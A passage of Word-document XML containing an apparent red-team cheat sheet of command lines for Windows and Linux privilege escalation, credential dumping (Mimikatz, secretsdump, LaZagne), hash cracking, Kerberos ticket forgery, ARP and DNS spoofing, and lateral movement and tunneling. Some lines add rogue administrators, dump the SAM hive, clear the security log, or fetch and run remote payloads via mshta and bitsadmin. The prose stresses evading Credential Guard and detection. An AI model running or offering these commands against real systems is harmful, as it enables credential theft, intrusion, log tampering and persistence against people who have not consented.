        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comprehensive PowerShell script for Windows privilege escalation enumeration. Checks 100+ vectors including token privileges, service misconfigurations, and stored credentials.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'Import-Module .\PrivescCheck.ps1; Invoke-PrivescCheck -o $OUTPUT'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'Import-Module .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -o $OUTPUT'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'Import-Module .\PrivescCheck.ps1; Invoke-PrivescCheck -Audit -o $OUTPUT'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'Invoke-PrivescCheck -Report $OUTPUT -Format TXT'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'Invoke-PrivescCheck -Report $OUTPUT -Format CSV'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'Invoke-PrivescCheck -Report $OUTPUT -Format XML'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'Invoke-PrivescCheck -Scope User -o $OUTPUT'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'Invoke-PrivescCheck -Scope Machine -o $OUTPUT'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'Invoke-PrivescCheck -Check $CHECK -o $OUTPUT'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'Invoke-PrivescCheck -Exclude $EXCLUDE -o $OUTPUT'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'Invoke-PrivescCheck -Force -o $OUTPUT'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Traitor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated Linux privilege escalation via known exploit techniques. Checks for sudo misconfigurations, SUID binaries, kernel exploits, and container escape opportunities.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traitor -v -e $EXPLOIT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traitor -v -a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traitor -v -e kernel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traitor -v -e docker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traitor -v -e sudo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traitor -v -e suid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traitor -v -e pkexec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traitor -v -e polkit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traitor -v -e capabilities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traitor -v -e path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traitor -v -e env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Watson</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Deprecated but conceptually foundational Windows privilege escalation enumeration tool. Modern replacements build upon its approach of checking KB patches against known exploits.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watson.exe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watson.exe -v $OS_VERSION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watson.exe -p $PATCH_LEVEL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watson.exe -a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watson.exe -e $EXPLOIT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watson.exe -c $CONFIG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watson.exe -f $FORMAT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watson.exe -q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watson.exe -d $DB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watson.exe -u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watson.exe -s $SERVICE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9. PSPY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Monitors Linux processes without requiring root privileges. Detects cron jobs, running scripts, and commands executed by other users in real-time, revealing scheduled escalation opportunities.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pspy64 -p -i 1000 -o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pspy32 -p -i 1000 -o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pspy64 -pf -i 500 -o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pspy64 -r $ROOT_DIR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pspy64 -l $LOG_FILE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pspy64 -p -i 1000 -c '$CMD_FILTER'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pspy64 -d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pspy64 --debug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pspy64 -p -i 1000 -f /tmp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pspy64 -p -i 1000 -r /opt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pspy64 -p -i 1000 --json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10. PEASS-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The complete PEASS suite including linpeas, winpeas, and macpeas. Unified privilege escalation enumeration across all major operating systems with consistent output formatting.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peass -l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peass -w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peass -m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peass -l -s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peass -w -s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peass -l -a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peass -w -a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peass -l -k $KEYWORD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peass -w -k $KEYWORD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peass -l -P $PASSWORD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peass -w -P $PASSWORD -o $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6: Credentials</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc006" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Extracting, dumping, and cracking authentication credentials from memory, registry, and stored files. This phase focuses on obtaining plaintext passwords, hashes, and Kerberos tickets for further access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools are selected for their ability to bypass modern protections like Credential Guard and LSA Protection while maintaining operational security and producing clean, actionable output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The definitive credential extraction tool for Windows. Extracts plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. Enables Pass-the-Hash, Pass-the-Ticket, Golden Ticket, Silver Ticket, and DCSync attacks.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mimikatz.exe 'privilege::debug' 'sekurlsa::logonpasswords' 'exit'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mimikatz.exe 'privilege::debug' 'lsadump::sam' 'exit'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mimikatz.exe 'privilege::debug' 'sekurlsa::tickets /export' 'exit'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mimikatz.exe 'privilege::debug' 'kerberos::ptt $TICKET' 'exit'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mimikatz.exe 'lsadump::dcsync /domain:$DOMAIN /user:$USER' 'exit'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mimikatz.exe 'lsadump::dcsync /domain:$DOMAIN /all' 'exit'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mimikatz.exe 'token::elevate' 'lsadump::secrets' 'exit'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mimikatz.exe 'privilege::debug' 'sekurlsa::ekeys' 'exit'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mimikatz.exe 'privilege::debug' 'sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH' 'exit'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mimikatz.exe 'lsadump::lsa /patch' 'exit'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mimikatz.exe 'crypto::certificates /systemstore:LOCAL_MACHINE /export' 'exit'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. SecretsDump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Impacket's credential extraction tool that remotely dumps SAM, LSA secrets, cached credentials, and NTDS.dit via DRSUAPI or VSS methods. The standard for domain credential harvesting.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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -sam $SAM -security $SECURITY -system $SYSTEM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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -just-dc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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -just-dc-user $TARGET_USER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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -just-dc-ntlm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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -history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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -pwd-last-set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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -user-status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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -k -no-pass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secretsdump.py $DOMAIN/$USER@$TARGET -hashes $LMHASH:$NTHASH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secretsdump.py $DOMAIN/$USER:$PASSWORD@$TARGET -use-vss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3. LaZagne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Cross-platform credential recovery tool that extracts passwords from browsers, databases, mail clients, and system credential stores. Supports Windows, Linux, and macOS with 25+ applications.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lazagne all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lazagne browsers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lazagne windows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lazagne databases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lazagne mails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lazagne git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lazagne memory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lazagne wifi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lazagne all -vv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lazagne all -password $MASTER_PASSWORD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lazagne all -output json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4. Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The world's fastest password recovery tool supporting 300+ hash types. Leverages GPU acceleration with optimized kernels for hash cracking at unprecedented speeds with rule-based and mask-based attacks.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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST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hashcat -m $HASH_TYPE -a 3 $HASHES $MASK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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST -r $RULES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hashcat -m $HASH_TYPE -a 6 $HASHES $WORDLIST $MASK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hashcat -m $HASH_TYPE -a 7 $HASHES $MASK $WORDLIST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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST --show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hashcat -m $HASH_TYPE -a 3 $HASHES -1 ?l?d ?1?1?1?1?1?1?1?1 -o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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST -O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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST -d $DEVICE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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST --potfile-disable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hashcat -m $HASH_TYPE -a 0 $HASHES $WORDLIST --increment --increment-min 6 -o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5. John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Versatile password cracker with auto-detection of hash formats. Jumbo edition adds 150+ hash types with GPU support via OpenCL, making it a reliable fallback when Hashcat is unavailable.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john --wordlist=$WORDLIST --format=$FORMAT $HASHES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john --incremental $HASHES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john --single $HASHES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john --wordlist=$WORDLIST --rules=Jumbo --format=$FORMAT $HASHES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john --show --format=$FORMAT $HASHES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john --list=formats | tr ',' '\n' | grep -i $SEARCH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john --wordlist=$WORDLIST --format=nt $HASHES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john --wordlist=$WORDLIST --format=sha512crypt $HASHES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john --wordlist=$WORDLIST --format=bcrypt $HASHES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john --fork=$CORES --wordlist=$WORDLIST $HASHES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john --wordlist=$WORDLIST --rules=KoreLogic $HASHES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Impacket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Essential Python library for low-level network protocol access. Its scripts enable SMB/MSRPC manipulation, credential relaying, and remote command execution across Windows networks.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psexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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smbclient.py $DOMAIN/$USER:$PASSWORD@$TARGET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 lookupsid.py $DOMAIN/$USER:$PASSWORD@$TARGET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samrdump.py $DOMAIN/$USER:$PASSWORD@$TARGET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rpcdump.py $DOMAIN/$USER:$PASSWORD@$TARGET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mssqlclient.py $DOMAIN/$USER:$PASSWORD@$TARGET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GetNPUsers.py $DOMAIN/$USER -dc-ip $DC_IP -no-pass -usersfile $USERS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GetUserSPNs.py $DOMAIN/$USER:$PASSWORD -dc-ip $DC_IP -request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ntlmrelayx.py -tf $TARGETS -smb2support -c '$COMMAND'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powerful Kerberos abuse toolkit for Active Directory. Supports AS-REP Roasting, Kerberoasting, ticket manipulation, and constrained delegation abuse with clean C# implementation.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Rubeus.exe kerberoast /outfile:$OUTPUT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Rubeus.exe asreproast /format:hashcat /outfile:$OUTPUT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Rubeus.exe dump /service:krbtgt /outfile:$OUTPUT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Rubeus.exe tgtdeleg /target:$TARGET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Rubeus.exe renew /ticket:$TICKET /outfile:$OUTPUT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Rubeus.exe s4u /user:$USER /rc4:$HASH /impersonateuser:$TARGET /msdsspn:$SPN /ptt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Rubeus.exe hash /user:$USER /password:$PASSWORD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Rubeus.exe golden /rc4:$KRBTGT_HASH /user:$USER /domain:$DOMAIN /sid:$SID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Rubeus.exe silver /rc4:$SERVICE_HASH /service:$SPN /user:$USER /domain:$DOMAIN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Rubeus.exe brute /passwords:$WORDLIST /outfile:$OUTPUT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Rubeus.exe describe /ticket:$TICKET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Kekeo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized Kerberos toolkit for advanced AD attacks. Enables unconstrained delegation abuse, MS14-068 exploitation, and cross-domain trust attacks with precise Kerberos protocol manipulation.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kekeo.exe 'tgt::ask /user:$USER /domain:$DOMAIN /ntlm:$HASH' 'exit'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kekeo.exe 'tgs::s4u /tgt:$TGT /user:$TARGET /service:$SPN' 'exit'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kekeo.exe 'misc::cmd' 'exit'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kekeo.exe 'tgt::pac /oldpac $OLD_PAC /newpac $NEW_PAC' 'exit'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kekeo.exe 'exploit::ms14068 /user:$USER /domain:$DOMAIN /sid:$SID /password:$PASSWORD'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kekeo.exe 'tgt::deleg /target:$TARGET' 'exit'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kekeo.exe 'tgs::ask /tgt:$TGT /service:$SPN' 'exit'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kekeo.exe 'kerberos::list' 'exit'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kekeo.exe 'kerberos::purge' 'exit'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kekeo.exe 'kerberos::ptt $TICKET' 'exit'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kekeo.exe 'misc::convert $TICKET' 'exit'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. BetterCAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern network attack and monitoring framework. Performs credential harvesting through ARP spoofing, DHCP exhaustion, and HSTS bypass with real-time password capture and protocol analysis.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-caplet hstshijack/hstshijack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'set arp.spoof.targets $TARGETS; arp.spoof on; net.sniff on'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'set dhcp6.spoof.domains $DOMAIN; dhcp6.spoof on'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'set net.sniff.verbose true; net.sniff on'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-caplet http-ui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'set wifi.interface $INTERFACE; wifi.recon on'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'ble.recon on'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'hid.inject on'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-caplet pcap.import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'set http.proxy.sslstrip true; http.proxy on'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'set dns.spoof.domains $DOMAIN; dns.spoof.address $FAKE_IP; dns.spoof on'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The swiss army knife for Active Directory and network pentesting. Combines SMB/WinRM/LDAP/MSSQL operations with credential testing, enumeration, and automated exploitation.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crackmapexec smb $TARGETS -u $USER -p $PASSWORD --shares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crackmapexec smb $TARGETS -u $USER -p $PASSWORD --sam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crackmapexec smb $TARGETS -u $USER -p $PASSWORD --lsa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crackmapexec smb $TARGETS -u $USER -p $PASSWORD --ntds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crackmapexec smb $TARGETS -u $USER -p $PASSWORD -x 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crackmapexec smb $TARGETS -u $USER -p $PASSWORD --spider $SHARE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crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --users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crackmapexec winrm $TARGETS -u $USER -p $PASSWORD -x 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crackmapexec mssql $TARGETS -u $USER -p $PASSWORD -x 'SELECT @@version'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crackmapexec smb $TARGETS -u $USER -p $PASSWORD -M lsassy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crackmapexec smb $TARGETS -u $USER -H $HASH --local-auth -x 'whoami'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 7: Movement</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc007" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pivoting between compromised systems to reach high-value targets. This phase focuses on fileless movement techniques, authenticated remote execution, and network tunneling while minimizing detection footprint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools prioritize operational security through built-in obfuscation, encrypted channels, and native protocol abuse that blends with legitimate administrative traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. SCShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fileless lateral movement tool that abuses ChangeServiceConfigA for remote command execution. Requires no service creation, works over SMB, and leaves minimal forensic artifacts.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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'powershell -enc $ENCODED'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'cmd /c whoami &gt; C:\Windows\Temp\out.txt'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'net user $NEW_USER $NEW_PASS /add'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'net localgroup administrators $NEW_USER /add'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'reg save HKLM\SAM C:\Windows\Temp\sam.hive'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'wevtutil cl security'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'bitsadmin /transfer $JOB $URL $DEST'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SCShell.exe $TARGET .\$USER $PASSWORD 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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'rundll32.exe C:\Windows\Temp\payload.dll,EntryPoint'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SCShell.exe $TARGET $DOMAIN $USER $PASSWORD 'mshta $URL'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. WMIExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Impacket's semi-interactive Windows Management Instrumentation shell. Executes commands via WMI without dropping files, using legitimate system administration protocols for stealthy lateral movement.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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -hashes $HASH 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -dc-ip $DC_IP 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -share ADMIN$ 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -nooutput 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -aesKey $AES_KEY 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -k 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -codec cp437 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -shell-type powershell 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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -file $CMD_FILE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wmiexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -timeout $TIMEOUT '$COMMAND'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. SMBExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Impacket's alternative to PsExec that executes commands via created SMB services. Provides a fully interactive shell with pass-the-hash support and no need for plaintext credentials.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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -hashes $HASH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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -share C$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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -dc-ip $DC_IP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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -k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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -mode SERVER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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -mode SHARE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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -port $PORT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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -file $CMD_FILE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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -nooutput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smbexec.py $DOMAIN/$USER:$PASSWORD@$TARGET -timeout $TIMEOUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Evil-WinRM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powershell remote management tool for Windows using the WinRM protocol. Provides a fully functional PowerShell shell with upload/download capability and in-memory script loading.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evil-winrm -i $TARGET -u $USER -p $PASSWORD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evil-winrm -i $TARGET -u $USER -H $HASH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evil-winrm -i $TARGET -u $USER -p $PASSWORD -s $PS_SCRIPTS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evil-winrm -i $TARGET -u $USER -p $PASSWORD -e $EXECUTABLES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evil-winrm -i $TARGET -u $USER -p $PASSWORD -S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evil-winrm -i $TARGET -u $USER -p $PASSWORD -c $PEM_CERT -k $PEM_KEY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evil-winrm -i $TARGET -u $USER -p $PASSWORD -p $PORT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evil-winrm -i $TARGET -u $USER -p $PASSWORD -U $URL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evil-winrm -i $TARGET -u $USER -p $PASSWORD -r $REALM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evil-winrm -i $TARGET -u $USER -p $PASSWORD -l $LOG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evil-winrm -i $TARGET -u $USER -p $PASSWORD --no-colors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Chisel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast TCP tunneling over HTTP using SSH protocol. Creates encrypted tunnels through restrictive firewalls and proxy servers with exceptional performance and minimal configuration overhead.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chisel server -p $PORT --reverse --socks5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chisel client $SERVER R:socks &gt;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chisel client $SERVER R:$LOCAL_PORT:$TARGET:$TARGET_PORT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chisel server -p $PORT --auth $USER:$PASS --reverse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chisel client --auth $USER:$PASS $SERVER R:socks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chisel client $SERVER $LOCAL_PORT:$TARGET:$TARGET_PORT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chisel server -p $PORT --reverse --key $PRIVATE_KEY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chisel client $SERVER --fingerprint $FP R:socks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chisel server -p $PORT --reverse --proxy http://$PROXY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chisel client $SERVER --header 'X-Custom: $VALUE' R:socks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chisel client $SERVER R:127.0.0.1:$PORT:$TARGET:445</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Ligolo-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced tunneling tool with TUN interface support. Provides network pivoting with proxy chains, file transfer, and SOCKS tunneling through a single lightweight agent with superior performance.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ligolo-ng -bind 0.0.0.0:$PORT -selfcert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ligolo-ng -connect $SERVER:$PORT -ignore-cert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ligolo-ng -connect $SERVER:$PORT -retry -ignore-cert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ligolo-ng -connect $SERVER:$PORT -socks 127.0.0.1:1080 -ignore-cert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ligolo-ng -connect $SERVER:$PORT -laddr 0.0.0.0 -lport $PORT -ignore-cert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ligolo-ng -bind 0.0.0.0:$PORT -laddr 0.0.0.0:$PORT -selfcert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ligolo-ng -connect $SERVER:$PORT -tun $TUN_IFACE -ignore-cert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ligolo-ng -agent -connect $SERVER:$PORT -ignore-cert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ligolo-ng -bind 0.0.0.0:$PORT -cert $CERT -key $KEY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ligolo-ng -connect $SERVER:$PORT -socks 127.0.0.1:$PORT -tun ligolo -ignore-cert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ligolo-ng -connect $SERVER:$PORT -auto-forward -ignore-cert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Socat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
